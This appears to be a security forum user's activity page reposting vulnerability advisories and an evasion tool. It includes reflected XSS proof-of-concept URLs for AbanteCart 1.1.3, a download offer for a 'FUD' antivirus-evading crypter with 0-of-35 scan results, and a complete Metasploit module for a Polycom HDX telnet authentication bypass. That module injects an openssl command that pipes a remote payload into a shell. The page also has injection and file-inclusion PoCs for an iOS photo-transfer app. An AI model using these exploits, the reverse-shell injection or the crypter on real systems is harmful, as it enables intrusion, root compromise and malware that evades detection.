Jump to content

Praetorian503

Active Members
 View Profile  See their activity

  • Posts

    578

  • Joined

  • Last visited

  • Days Won

    5

 Content Type 

Everything posted by Praetorian503

  1. Praetorian503
    AbanteCart version 1.1.3 suffers from multiple cross site scripting vulnerabilities. AbanteCart 1.1.3 (index.php) Multiple Reflected XSS Vulnerabilities Vendor: Belavier Commerce Product web page: http://www.abantecart.com Affected version: 1.1.3 Summary: AbanteCart is a free PHP based eCommerce solution for merchants to provide ability creating online business and sell products online quick and efficient. Desc: AbanteCart suffers from multiple reflected cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to 'index.php' script is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2013-5125 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5125.php 08.02.2013 -- Affected parameters: limit, page, rt, sort, currency, product_id, language, s, manufacturer_id, token. PoC: http://localhost/abantecart/index.php?limit=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&page=1%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/special%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E&sort=%22%3E%3Cscript%3Ealert%284%29;%3C/script%3E http://localhost/abantecart/index.php?currency=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&product_id=109%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&rt=product/product http://localhost/abantecart/index.php?rt=product/manufacturer&manufacturer_id=15%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E http://localhost/abantecart/index.php?rt=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E&s=your_admin%22%3E%3Cscript%3Ealert%282%29;%3C/script%3E&token=957bf7cb71078f4471807da1c42d721e%22%3E%3Cscript%3Ealert%283%29;%3C/script%3E Source: PacketStorm
  2. Praetorian503
    Download UFR Crypter re(FUD).rar NowDownload - Keeping your files safe. Pass imagen (Hex) File Info: File Name: Stub.exe SHA1: 31142069363d04c7e81e16e268abf548c9506475 MD5: 2909acd1e62ef01f755a87a4d57a0d7f Date and Time: 13-02-13,11:25:54 Report Generated by LeVeL-23.Biz File Size: 658433 Bytes Detection: 0 of 35 Detections: AVG Free Clean ArcaVir Clean Avast 5 Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Clean Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Antivirus Clean K7 Ultimate Clean NANO Antivirus Clean VIPRE Clean File Info: File Name: result.exe SHA1: 859f0c90f25c3a1d1134deae88da26c597634604 MD5: c6e00da17d4fdb647a546a247e93d214 Date and Time: 13-02-13,11:33:50 Report Generated by LeVeL-23.Biz File Size: 683530 Bytes Detection: 0 of 35 Detections: AVG Free Clean ArcaVir Clean Avast 5 Clean AntiVir (Avira) Clean BitDefender Clean VirusBuster Internet Security Clean Clam Antivirus Clean COMODO Internet Security Clean Dr.Web Clean eTrust-Vet Clean F-PROT Antivirus Clean F-Secure Internet Security Clean G Data Clean IKARUS Security Clean Kaspersky Antivirus Clean McAfee Clean MS Security Essentials Clean ESET NOD32 Clean Norman Clean Norton Antivirus Clean Panda Security Clean A-Squared Clean Quick Heal Antivirus Clean Solo Antivirus Clean Sophos Clean Trend Micro Internet Security Clean VBA32 Antivirus Clean Vexira Antivirus Clean Zoner AntiVirus Clean Ad-Aware Clean BullGuard Clean Immunet Antivirus Clean K7 Ultimate Clean NANO Antivirus Clean VIPRE Clean
  3. Praetorian503
    The Polycom HDX is a series of telecommunication and video devices. The telnet component of Polycom HDX video endpoint devices is vulnerable to an authorization bypass when multiple simultaneous connections are repeatedly made to the service, allowing remote network attackers to gain full access to a Polycom command prompt without authentication. Versions prior to 3.0.4 also contain OS command injection in the ping command which can be used to escape the telnet prompt and execute arbitrary commands as root. Full Metasploit module included. ======================================================================== = Polycom HDX Telnet Authorization Bypass = = Vendor Website: = www.polycom.com = = Affected Version: = Polycom HDX devices: = All releases prior to and including Commercial 3.0.5 = = Public disclosure on January 18, 2013 = ======================================================================== == Overview == The Polycom HDX is a series of telecommunication and video devices. The telnet component of Polycom HDX video endpoint devices is vulnerable to an authorization bypass when multiple simultaneous connections are repeatedly made to the service, allowing remote network attackers to gain full access to a Polycom command prompt without authentication. Versions prior to 3.0.4 also contain OS command injection in the ping command which can be used to escape the telnet prompt and execute arbitrary commands as root. == Solution == Until a software solution is released, Polycom recommends administrators disable telnet on their HDX unit. == Credit == Discovered and advised to Polycom Inc., 2012 by Paul Haas of Security-Assessment.com. == About Security-Assessment.com == Security-Assessment.com is a leading team of Information Security consultants specializing in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognized companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Web: www.security-assessment.com Email: info@security-assessment.com == Exploitation == The following Metasploit module can be used to reproduce the issue: cat > psh_auth_bypass.rb <<EOF ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report def initialize(info = {}) super(update_info(info, 'Name' => 'Polycom Command Shell Authorization Bypass', 'Alias' => 'psh_auth_bypass', 'Author' => [ 'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>' ], 'DisclosureDate' => 'Jan 18 2013', 'Description' => %q{ The login component of the Polycom Command Shell on Polycom HDX Video End Points running software versions 3.0.5 and earlier is vulnerable to an authorization bypass when simultaneous connections are made to the service, allowing remote network attackers to gain access to a sandboxed telnet prompt without authentication. Versions prior to 3.0.4 contain OS command injection in the ping command which can be used to execute arbitrary commands as root. }, 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ], [ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Space' => 8000, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd',}, }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' }, 'DefaultTarget' => 0 )) register_options( [ Opt::RHOST(), Opt::RPORT(23), OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]), OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ]) ],self.class) register_advanced_options( [ OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]), OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100]) ], self.class) end def check connect sock.put(Rex::Text.rand_text_alpha(rand(5)+1) + "\n") ::IO.select(nil, nil, nil, 1) res = sock.get disconnect if !(res and res.length > 0) return Exploit::CheckCode::Safe end if (res =~ /Welcome to ViewStation/) return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit # Keep track of results (successful connections) results = [] # Random string for password password = Rex::Text.rand_text_alpha(rand(5)+1) # Threaded login checker max_threads = datastore['THREADS'] cur_threads = [] # Try up to 100 times just to be sure queue = [*(1 .. datastore['MAX_CONNECTIONS'])] print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ") while(queue.length > 0) while(cur_threads.length < max_threads) # We can stop if we get a valid login break if results.length > 0 # keep track of how many attempts we've made item = queue.shift # We can stop if we reach max tries break if not item t = Thread.new(item) do |count| sock = connect sock.put(password + "\n") res = sock.get while res.length > 0 break if results.length > 0 # Post-login Polycom banner means success if (res =~ /Polycom/) results << sock break # bind error indicates bypass is working elsif (res =~ /bind/) sock.put(password + "\n") #Login error means we need to disconnect elsif (res =~ /failed/) break #To many connections means we need to disconnect elsif (res =~ /Error/) break end res = sock.get end end cur_threads << t end # We can stop if we get a valid login break if results.length > 0 # Add to a list of dead threads if we're finished cur_threads.each_index do |ti| t = cur_threads[ti] if not t.alive? cur_threads[ti] = nil end end # Remove any dead threads from the set cur_threads.delete(nil) ::IO.select(nil, nil, nil, 0.25) end # Clean up any remaining threads cur_threads.each {|sock| sock.kill } if results.length > 0 print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw") do_payload(results[0]) else print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable") end end def do_payload(sock) # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST']) # Start a listener start_listener(true) # Figure out the port we picked cbport = self.service.getsockname[2] # Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128 cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n" sock.put(cmd) # Give time for our command to be queued and executed 1.upto(5) do ::IO.select(nil, nil, nil, 1) break if session_created? end end def stage_final_payload(cli) print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...") cli.put(payload.encoded + "\n") end def start_listener(ssl = false) comm = datastore['ListenerComm'] if comm == "local" comm = ::Rex::Socket::Comm::Local else comm = nil end self.service = Rex::Socket::TcpServer.create( 'LocalPort' => datastore['CBPORT'], 'SSL' => ssl, 'SSLCert' => datastore['SSLCert'], 'Comm' => comm, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, }) self.service.on_client_connect_proc = Proc.new { |client| stage_final_payload(client) } # Start the listening service self.service.start end # Shut down any running services def cleanup super if self.service print_status("Shutting down payload stager listener...") begin self.service.deref if self.service.kind_of?(Rex::Service) if self.service.kind_of?(Rex::Socket) self.service.close self.service.stop end self.service = nil rescue ::Exception end end end # Accessor for our TCP payload stager attr_accessor :service end EOF Source: PacketStorm
  4. Praetorian503
    Transferable Remote version 1.1 for iPad and iPhone suffers from cross site scripting, remote command injection, and local file inclusion vulnerabilities. Title: ====== Transferable Remote v1.1 iPad iPhone - Multiple Web Vulnerabilities Date: ===== 2013-02-09 References: =========== http://www.vulnerability-lab.com/get_content.php?id=863 VL-ID: ===== 863 Common Vulnerability Scoring System: ==================================== 8.5 Introduction: ============= Transferable is the easiest way to download photos from your iPhone, iPad or iPod Touch to your Mac or PC! Transferable let`s you download your photos and albums using just a web browser - no need for iTunes or even plugging your device in! As soon as the app launches it displays a web address, simply type this into a web browser on your PC or Mac and you will be able to browse, download or upload photos and albums! - Easy to use interface - Wifi Transfer - iTunes not required - Download single pictures or whole albums! - Upload photos from your PC/Mac to your iPhone, iPad or iPod Touch - Star your favorite photos for download - No limit on number of photos that can be downloaded - Works with any web browser - no installation required! - View Thumbnails and full resolution pictures - Download photos as a zip Transferable requires a wifi connection and an iphone or ipad device with iOS. (Copy of the Homepage: https://itunes.apple.com/us/app/transferable-pro-wifi-photo/id518154149) Abstract: ========= The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile Transferable Remote v1.01 app for the apple ipad & iphone. Report-Timeline: ================ 2013-02-09: Public Disclosure Status: ======== Published Affected Products: ================== Apple AppStore Product: Transferable Remote 1.01 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A local file include web vulnerability via POST request method is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone. The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files. The vulnerbility is located in the downloadPhoto module of the webserver (http://192.168.0.10:80) when processing to load a manipulated `assets-library` url parameter. The execution of the injected path or file request will occur when the attacker is processing to reload to index listing of the affected module. Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction. Successful exploitation of the vulnerability results in unauthorized path or file access via local file or path include attack. Vulnerable Application(s): [+] Transferable Remote v1.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] downloadPhoto Vulnerable Parameter(s): [+] assets-library Affected Module(s): [+] Index Listing 1.2 A local command injection web vulnerability is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone. The vulnerability allows to inject local commands via vulnerable system values to compromise the apple mobile application. The vulnerbility is located in the index module when processing to load the ipad or iphone device name. Local attackers can change the ipad or iphone device name to system specific commands and file/path requests to provoke the execution when processing to watch the index listing. Exploitation of the web vulnerability does not require a privileged application user account (standard) or user interaction. Successful exploitation of the vulnerability results unauthorized execution of system specific commands and path requests. Vulnerable Application(s): [+] Transferable Remote v1.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Index Vulnerable Parameter(s): [+] device name - iPad or iPone Affected Module(s): [+] Index Listing (Device Name) 1.3 A persistent input validation vulnerability is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone. The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app web service. The vulnerability is located in the downloadCollection module of the webserver (http://192.168.0.10:80) when processing to request via POST manipulated name, ext and url parameters. The persistent script code will be executed out of the downloadcollection module listing. Exploitation of the vulnerability requires low or medium user interaction and with low or medium privileged application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] Transferable Remote v1.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] downloadCollection Vulnerable Parameter(s): [+] url & ext Affected Module(s): [+] Index Listing (Device Name) 1.4 A non-persistent cross site scripting vulnerability is detected in the mobile Transferable Remote v1.01 app for the apple ipad & iphone. The vulnerability allows remote attackers to form manipulated request to hijack employeerss, moderator or admin sessions via client side browser attack. The vulnerability is located in the appliance invalid Exception Handling module and the not secure parsed path & id variables. Successful exploitation of the vulnerability result in account steal via client side session hijacking, client site phishing, or client-side content request manipulation. Vulnerable Application(s): [+] Transferable Remote v1.0 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Index Vulnerable Module(s): [+] page and bound id Affected Module(s): [+] Exception Handling (Error) Listing Proof of Concept: ================= 1.1 The local File Include web vulnerability can be exploited by remote attacker without required application user account (no password: standard) and also without user interaction. For demonstration or reproduce ... Local Path Include Vulnerability PoC: http://192.168.0.10/downloadPhoto/assets-library://[INCLUDE FILE, PATH OR URL]<(POST) Reference(s): http://192.168.0.10/downloadPhoto/ 1.2 The command injection web vulnerability can be exploited by local attacker with required device application user account and with low user interaction. For demonstration or reproduce ... Command Injection via Devicename PoC: {"devcname":"IPad360 ¥337","devctype":"ipad","pro":"false"} ... {"devcname":"[COMMAND INJECTION VIA DEVICENAME]","devctype":"ipad","pro":"false"<OR true;)} Reference(s): http://192.168.0.10/getSettings http://192.168.0.10/ 1.3 The persistent validation web vulnerability can be exploited by remote attackers with required application user account and with low or medium user interaction. For demonstration or reproduce ... POST Inject via Download marked (star) files PoC: (POST) input=%5B%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DF102FE64-1463-4150-8FF8-0A512E7EB278%26 ext%3DJPG%22%2C%22name%22%3A%22<[INJECTED SCRIPT CODE!]") <.JPG%22%2C%22search%22%3A%22<[INJECTED SCRIPT CODE!]") <JPG%22%7D%2C%7B%22url%22%3A%22 assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D7A40B84F-CE2A-40C7-87C9-C66927626F66%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0004.JPG%22%2C%22search %22%3A%22IMG0004JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D11E8FF27-B3A4-46B9-B320-74EFBDF9760D%26ext%3DJPG%22%2C %22name%22%3A%22IMG_0008.JPG%22%2C%22search%22%3A%22IMG0008JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG %3Fid%3D8EC135C1-D1DF-458F-B7B5-75DF2EB87B06%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0010.JPG%22%2C%22search%22%3A%22IMG0010JPG%22%7D%2C%7B%22url %22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DAD9CA73F-1ED4-4708-83DB-AC27441D9CC5%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0011.JPG%22 %2C%22search%22%3A%22IMG0011JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D2DF297C4-1EC7-4B96-8B74-F4923AF9FBDA%26 ext%3DJPG%22%2C%22name%22%3A%22IMG_0012.JPG%22%2C%22search%22%3A%22IMG0012JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG %3Fid%3D7A8B8F5B-B524-44E3-8C99-6DB2AB258E66%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0013.JPG%22%2C%22search%22%3A%22IMG0013JPG%22%7D%2C%7B%22url%22 %3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D76E366E9-AAF2-41A5-8D9C-599F1242001D%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0014.JPG%22%2C%22 search%22%3A%22IMG0014JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D27000044-675B-4C67-A4ED-2EA38B8318E5%26ext%3D JPG%22%2C%22name%22%3A%22IMG_0015.JPG%22%2C%22search%22%3A%22IMG0015JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D 4C0729AE-7BBC-4DC6-BDF4-62E7D48AE167%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0016.JPG%22%2C%22search%22%3A%22IMG0016JPG%22%7D%2C%7B%22url%22%3A%22 assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D5457AD21-66CD-4CF4-8F3E-1ACE66761742%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0017.JPG%22%2C%22search %22%3A%22IMG0017JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DCA15604D-4344-4739-9B7D-4B2B87BFC04E%26ext%3DJPG%22 %2C%22name%22%3A%22IMG_0018.JPG%22%2C%22search%22%3A%22IMG0018JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D 20BDBEC2-3B0E-435E-87B5-5DF1228D8164%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0019.JPG%22%2C%22search%22%3A%22IMG0019JPG%22%7D%2C%7B%22url%22%3A%22 assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DD69EDCA7-632F-417B-895A-88B6900282EE%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0020.JPG%22%2C%22search %22%3A%22IMG0020JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D0207435E-10A3-4F4E-8B49-05E891C4BC0A%26ext%3DJPG %22%2C%22name%22%3A%22IMG_0021.JPG%22%2C%22search%22%3A%22IMG0021JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3F id%3D4A9763CC-8EB3-4B12-802F-3C3E5A092CD2%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0022.JPG%22%2C%22search%22%3A%22IMG0022JPG%22%7D%2C%7B%22url%22 %3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D5AF6F15B-6F68-48E8-9ACB-8D424A3C8AEB%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0023.JPG%22%2C %22search%22%3A%22IMG0023JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D3477F60C-DD79-4022-B1FB-37F1038E89C2%26 ext%3DJPG%22%2C%22name%22%3A%22IMG_0024.JPG%22%2C%22search%22%3A%22IMG0024JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG %3Fid%3D1A072B2E-8869-4845-A9DF-EB1C5BAA6728%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0025.JPG%22%2C%22search%22%3A%22IMG0025JPG%22%7D%2C%7B%22url %22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DA7611789-4D0B-42D0-91CA-8D268C0D9721%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0026.JPG%22 %2C%22search%22%3A%22IMG0026JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DF0D4C1E7-9318-46F3-A539-B2140BD5A10A%26 ext%3DJPG%22%2C%22name%22%3A%22IMG_0027.JPG%22%2C%22search%22%3A%22IMG0027JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG %3Fid%3D2433465E-2C1E-4133-8FA0-D4800BF334A8%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0028.JPG%22%2C%22search%22%3A%22IMG0028JPG%22%7D%2C%7B%22url%22 %3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D712872C7-7A34-452A-816D-57DB34ABD3F3%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0029.JPG%22%2C%22 search%22%3A%22IMG0029JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D3874F42F-5AB7-4E3E-8913-C5EAC4E9FED5%26ext%3D JPG%22%2C%22name%22%3A%22IMG_0030.JPG%22%2C%22search%22%3A%22IMG0030JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D 6C2CA643-C80D-455C-BC35-3705E8EFAF3D%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0031.JPG%22%2C%22search%22%3A%22IMG0031JPG%22%7D%2C%7B%22url%22%3A%22 assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DDA8CE2BD-9F39-4037-B82A-DDFBF32D42C3%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0032.JPG%22%2C%22search %22%3A%22IMG0032JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DCA7E8330-FB0B-4F04-8E78-899DA951F003%26ext%3DJPG%22 %2C%22name%22%3A%22IMG_0033.JPG%22%2C%22search%22%3A%22IMG0033JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D B0D24A45-61B9-4181-B6C7-D5F012D2FC57%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0034.JPG%22%2C%22search%22%3A%22IMG0034JPG%22%7D%2C%7B%22url%22%3A%22 assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D012F05C9-AE5B-423B-AE00-A112FCBE9897%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0035.JPG%22%2C%22search %22%3A%22IMG0035JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DD19E01E0-B803-4ACB-A2AE-259C1247916A%26ext%3DJPG %22%2C%22name%22%3A%22IMG_0036.JPG%22%2C%22search%22%3A%22IMG0036JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid %3DA9F743E5-9D18-4236-A666-AE890431F738%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0037.JPG%22%2C%22search%22%3A%22IMG0037JPG%22%7D%2C%7B%22url%22%3A %22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3D970D6C1D-99F8-4B5B-963C-F60931B910A9%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0038.JPG%22%2C%22 search%22%3A%22IMG0038JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DDA5B327A-8016-4574-AF37-4AD9F13533B3%26ext %3DJPG%22%2C%22name%22%3A%22IMG_0039.JPG%22%2C%22search%22%3A%22IMG0039JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG %3Fid%3DAEE85816-B08F-44D2-8F21-18209C6A37EE%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0040.JPG%22%2C%22search%22%3A%22IMG0040JPG%22%7D%2C%7B%22url %22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DB3CBB8B4-1323-4EB6-A029-8C2D17FC9FDC%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0041.JPG%22 %2C%22search%22%3A%22IMG0041JPG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG%3Fid%3D2C37BCB2-820C-4884-8126-5CD71FD4D7B6%26ext %3DPNG%22%2C%22name%22%3A%22IMG_0042.PNG%22%2C%22search%22%3A%22IMG0042PNG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG %3Fid%3D7A039467-1507-4031-ACCD-F5E327763DB7%26ext%3DPNG%22%2C%22name%22%3A%22IMG_0043.PNG%22%2C%22search%22%3A%22IMG0043PNG%22%7D%2C%7B%22url %22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG%3Fid%3D109F6B8A-1B7E-4371-AFBE-C58E924347C0%26ext%3DPNG%22%2C%22name%22%3A%22IMG_0044.PNG %22%2C%22search%22%3A%22IMG0044PNG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.PNG%3Fid%3D870C9313-4069-41A2-A274-C37D29ED9D16%26ext %3DPNG%22%2C%22name%22%3A%22IMG_0045.PNG%22%2C%22search%22%3A%22IMG0045PNG%22%7D%2C%7B%22url%22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG %3Fid%3DAB71436A-9D20-4B18-92FB-F7E54293E082%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0007.JPG%22%2C%22search%22%3A%22IMG0007JPG%22%7D%2C%7B%22url %22%3A%22assets-library%3A%2F%2Fasset%2Fasset.JPG%3Fid%3DA1611D33-B9C0-4F56-BFE0-F219AE129EAF%26ext%3DJPG%22%2C%22name%22%3A%22IMG_0006.JPG %22%2C%22search%22%3A%22IMG0006JPG%22%7D%5D Reference(s): http://192.168.0.10/downloadCollection 1.4 The client side cross site scripting web vulnerability can be exploited by remote attacker without privileged application user account and with medium or high required user interaction. For demonstration or reproduce ... Client Side Cross Site Scripting - Exception Handling PoC: http://137.168.0.10:15555/0/-x[CLIENT SIDE INJECTED SCRIPT CODE! XSS] Manually steps to reproduce ... 1. Install the service application on your mobile ipad or iphone device 2. Start the software and open http://192.168.0.10:15555/ 3. Include the following path `0/-1` to provoke the an invalid application error (Example: http://137.168.0.10:15555/0/-1) 4. The -1 will be displayed with the path in a script bound to the invalid value exception 5. Now, the attacker can include his script code and request the same script via GET again 6. The script will be executed on client side in the browser when processing to load the manipulated link 7. Successful reproduce ... done! Reference(s): http://137.168.0.10:15555/0/ http://137.168.0.10:15555/1/ http://137.168.0.10:15555/2 http://137.168.0.10:15555/3/ Risk: ===== 1.1 The security risk of the file include web vulnerability is estimated as critical. 1.2 The security risk of the local command inject vulnerability via devicename is estimated as high(-). 1.3 The security risk of the persistent input validation web vulnerability is estimated as medium(+). 1.4 The security risk of the client side cross site scripting web vulnerability is estimated as low(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Vulnerability Laboratory [Research Team] - Chokri Ben Achour (meister@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability 